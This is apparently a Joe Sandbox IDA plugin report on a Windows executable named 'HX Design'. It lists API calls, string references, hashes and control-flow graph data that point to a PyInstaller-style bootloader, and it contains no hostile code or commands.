                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1617910340-0
                                                                                                                                                                                                                                                      • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                                      • Instruction ID: bb852ee9146f8da58719cd6dd1fd98c8801e4ce85c16be6e33d4027131075355
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7FC1DF32B28A4596EB10EFA9C4802BD7771F749BA8F810235DA2E9B7D4DF78D059D310

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1473 7ff732085e7c-7ff732085eb1 call 7ff732085588 call 7ff732085590 call 7ff7320855f8 1480 7ff732085eb7-7ff732085ec2 call 7ff732085598 1473->1480 1481 7ff732085fef-7ff73208605d call 7ff73207a900 call 7ff732081578 1473->1481 1480->1481 1486 7ff732085ec8-7ff732085ed3 call 7ff7320855c8 1480->1486 1493 7ff73208606b-7ff73208606e 1481->1493 1494 7ff73208605f-7ff732086066 1481->1494 1486->1481 1492 7ff732085ed9-7ff732085efc call 7ff73207a948 GetTimeZoneInformation 1486->1492 1507 7ff732085fc4-7ff732085fee call 7ff732085580 call 7ff732085570 call 7ff732085578 1492->1507 1508 7ff732085f02-7ff732085f23 1492->1508 1497 7ff7320860a5-7ff7320860b8 call 7ff73207d5fc 1493->1497 1498 7ff732086070 1493->1498 1496 7ff7320860fb-7ff7320860fe 1494->1496 1499 7ff732086104-7ff73208610c call 7ff732085c00 1496->1499 1500 7ff732086073 1496->1500 1511 7ff7320860ba 1497->1511 1512 7ff7320860c3-7ff7320860de call 7ff732081578 1497->1512 1498->1500 1503 7ff732086078-7ff7320860a4 call 7ff73207a948 call 7ff73206c550 1499->1503 1500->1503 1504 7ff732086073 call 7ff732085e7c 1500->1504 1504->1503 1513 7ff732085f2e-7ff732085f35 1508->1513 1514 7ff732085f25-7ff732085f2b 1508->1514 1517 7ff7320860bc-7ff7320860c1 call 7ff73207a948 1511->1517 1528 7ff7320860e5-7ff7320860f7 call 7ff73207a948 1512->1528 1529 7ff7320860e0-7ff7320860e3 1512->1529 1519 7ff732085f49 1513->1519 1520 7ff732085f37-7ff732085f3f 1513->1520 1514->1513 1517->1498 1523 7ff732085f4b-7ff732085fbf call 7ff73208a4d0 * 4 call 7ff732082b5c call 7ff732086114 * 2 1519->1523 1520->1519 1527 7ff732085f41-7ff732085f47 1520->1527 1523->1507 1527->1523 1528->1496 1529->1517
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF732085EAA
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7320855F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73208560C
                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF732085EBB
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732085598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7320855AC
                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF732085ECC
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7320855C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7320855DC
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF73207A948: HeapFree.KERNEL32(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A95E
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF73207A948: GetLastError.KERNEL32(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A968
                                                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF73208610C), ref: 00007FF732085EF3
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                      • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                      • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                                      • Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                                      • Instruction ID: ad0385f4b0f1b262279072445e17238f0daa9bbdaece61cdeeaa393386809975
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2851B532A08642A6E750FF31D8815BAF761FB88784FC14135EA4D47696DFBCE409E760
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106227546.00007FFDFB2A9000.00000080.00000001.01000000.00000010.sdmp, Offset: 00007FFDFADA0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104707036.00007FFDFADA0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104758778.00007FFDFADA1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104758778.00007FFDFADB2000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104758778.00007FFDFADC2000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104758778.00007FFDFADC8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104758778.00007FFDFAE12000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104758778.00007FFDFAE27000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104758778.00007FFDFAE37000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104758778.00007FFDFAE3E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104758778.00007FFDFAE4C000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104758778.00007FFDFB02E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104758778.00007FFDFB119000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104758778.00007FFDFB11B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104758778.00007FFDFB152000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104758778.00007FFDFB18F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104758778.00007FFDFB1EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104758778.00007FFDFB25B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104758778.00007FFDFB290000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104758778.00007FFDFB2A3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106274168.00007FFDFB2AA000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfada0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                      • String ID: )tP
                                                                                                                                                                                                                                                      • API String ID: 3300690313-3907340667
                                                                                                                                                                                                                                                      • Opcode ID: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
                                                                                                                                                                                                                                                      • Instruction ID: e7a7d8d55b78ea5ec4357bdc385f5db5435c1d1a68c496e141b06242a9a16ccf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C062572272819296E719CF39D4106BD77A4F748785F045532EBAECB7D8EA3CEA45CB00
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108018555.00007FFDFBAB3000.00000080.00000001.01000000.00000005.sdmp, Offset: 00007FFDFB460000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106780302.00007FFDFB460000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106827061.00007FFDFB461000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106827061.00007FFDFB736000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106827061.00007FFDFB745000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106827061.00007FFDFB74F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106827061.00007FFDFB791000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106827061.00007FFDFB860000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106827061.00007FFDFB868000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106827061.00007FFDFB96B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106827061.00007FFDFB96F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106827061.00007FFDFB9B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106827061.00007FFDFB9BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106827061.00007FFDFB9FF000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106827061.00007FFDFBA33000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106827061.00007FFDFBA5D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106827061.00007FFDFBA72000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106827061.00007FFDFBAAC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108069571.00007FFDFBAB5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb460000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3300690313-0
                                                                                                                                                                                                                                                      • Opcode ID: 248494c49456e9061dd29398c4c192e6d920701940ac97edae2a832ef171e598
                                                                                                                                                                                                                                                      • Instruction ID: e5da794066cb80445f9f4987f002fb62e026548d81cfde92beded70aff1fc48c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 248494c49456e9061dd29398c4c192e6d920701940ac97edae2a832ef171e598
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5062266272999286E7158F38D41067D77E0F748785F049532EABEC37D8EABCEA45CB00
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2104600723.00007FFDFAD90000.00000080.00000001.01000000.00000016.sdmp, Offset: 00007FFDFACE0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104206646.00007FFDFACE0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFACE1000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD2A000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD38000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD87000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD8C000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD8F000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104654670.00007FFDFAD92000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdface0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3300690313-0
                                                                                                                                                                                                                                                      • Opcode ID: 6f314cbc243d0361b81c21546ac629a958ec6804df8a06217d551e75d8bff2aa
                                                                                                                                                                                                                                                      • Instruction ID: 0cb5287a5c4e2259f3bf4a5933617f93466169cd20e2ec617ed92db9a04b5f71
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f314cbc243d0361b81c21546ac629a958ec6804df8a06217d551e75d8bff2aa
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E62186272859286E7598E38E8107BD77A0F74C789F045531EAAEC37C8FA7CEA45C700
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: :memory:
                                                                                                                                                                                                                                                      • API String ID: 4225454184-2920599690
                                                                                                                                                                                                                                                      • Opcode ID: f17bc2a7fbc240265f12274023a72bab645a00ad97817d0cd97924ee0e2d3e31
                                                                                                                                                                                                                                                      • Instruction ID: c9883659479a37f32a7d2ae94fba055792d8c770e77a11f413c2c530c1ed075f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f17bc2a7fbc240265f12274023a72bab645a00ad97817d0cd97924ee0e2d3e31
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36426121B4A78383EB65AB159960B397BE0FF45B88F084135CEAD427E9DF3CE5958300
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2295610775-0
                                                                                                                                                                                                                                                      • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                                      • Instruction ID: 02c21f81cf5930699b53effc15c3261ef440a048d7f8fde97923d82809baa6ad
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42F0A422A1864686F7609B60B488776F350EB84328F840235DAAD02AD4DF7CD04CDB04
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InfoSystem
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 31276548-0
                                                                                                                                                                                                                                                      • Opcode ID: 0609f6becf4837133f86ac5623d419228c70d3b405efdb4a8828f98acc38b35e
                                                                                                                                                                                                                                                      • Instruction ID: 61bd7d38b8b2a85ed16f1ee72dfadb09ab9bf3cee9fd7fc59516416eab004d4d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0609f6becf4837133f86ac5623d419228c70d3b405efdb4a8828f98acc38b35e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BBA1D520F0BB87C1FF588B45A974A7426A0BF45B49F944535CD3E867F8DF2CA6A18301

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 635 7ff732061950-7ff73206198b call 7ff7320645c0 638 7ff732061c4e-7ff732061c72 call 7ff73206c550 635->638 639 7ff732061991-7ff7320619d1 call 7ff732067f90 635->639 644 7ff732061c3b-7ff732061c3e call 7ff73207004c 639->644 645 7ff7320619d7-7ff7320619e7 call 7ff7320706d4 639->645 649 7ff732061c43-7ff732061c4b 644->649 650 7ff732061a08-7ff732061a24 call 7ff73207039c 645->650 651 7ff7320619e9-7ff732061a03 call 7ff732074f08 call 7ff732062910 645->651 649->638 657 7ff732061a26-7ff732061a40 call 7ff732074f08 call 7ff732062910 650->657 658 7ff732061a45-7ff732061a5a call 7ff732074f28 650->658 651->644 657->644 664 7ff732061a5c-7ff732061a76 call 7ff732074f08 call 7ff732062910 658->664 665 7ff732061a7b-7ff732061afc call 7ff732061c80 * 2 call 7ff7320706d4 658->665 664->644 677 7ff732061b01-7ff732061b14 call 7ff732074f44 665->677 680 7ff732061b16-7ff732061b30 call 7ff732074f08 call 7ff732062910 677->680 681 7ff732061b35-7ff732061b4e call 7ff73207039c 677->681 680->644 687 7ff732061b50-7ff732061b6a call 7ff732074f08 call 7ff732062910 681->687 688 7ff732061b6f-7ff732061b8b call 7ff732070110 681->688 687->644 695 7ff732061b9e-7ff732061bac 688->695 696 7ff732061b8d-7ff732061b99 call 7ff732062710 688->696 695->644 698 7ff732061bb2-7ff732061bb9 695->698 696->644 701 7ff732061bc1-7ff732061bc7 698->701 702 7ff732061bc9-7ff732061bd6 701->702 703 7ff732061be0-7ff732061bef 701->703 704 7ff732061bf1-7ff732061bfa 702->704 703->703 703->704 705 7ff732061bfc-7ff732061bff 704->705 706 7ff732061c0f 704->706 705->706 707 7ff732061c01-7ff732061c04 705->707 708 7ff732061c11-7ff732061c24 706->708 707->706 709 7ff732061c06-7ff732061c09 707->709 710 7ff732061c2d-7ff732061c39 708->710 711 7ff732061c26 708->711 709->706 712 7ff732061c0b-7ff732061c0d 709->712 710->644 710->701 711->710 712->708
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732067F90: _fread_nolock.LIBCMT ref: 00007FF73206803A
                                                                                                                                                                                                                                                      • _fread_nolock.LIBCMT ref: 00007FF732061A1B
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732062910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF732061B6A), ref: 00007FF73206295E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                      • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                      • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                      • Opcode ID: b426b7569fd43417053a9482fb0298cff99dadbc456d732c1d031cb9eee9613e
                                                                                                                                                                                                                                                      • Instruction ID: 6abbf888d3bef507ff97607c077b66e6df0a285623eb5ece0453c1632daea40a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b426b7569fd43417053a9482fb0298cff99dadbc456d732c1d031cb9eee9613e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B81A571B0C686A5EB20FB14D0402B9E3A1EF88B84FC48531D98D87796DEBCE54DE764

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                      • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                      • Opcode ID: 72f99dadd0a2177c1d42b060d7648ca84eb7dddf70f4030becfdb2944091b5e7
                                                                                                                                                                                                                                                      • Instruction ID: 03f748e23ab184c15441e64723ba966020395d3cb8ef41e5b78a5ffe30c64f04
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 72f99dadd0a2177c1d42b060d7648ca84eb7dddf70f4030becfdb2944091b5e7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10418121B08643A6EB10FB21D4405BAE390FF44B94FC44532ED9D47B96DEBCE519E728

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
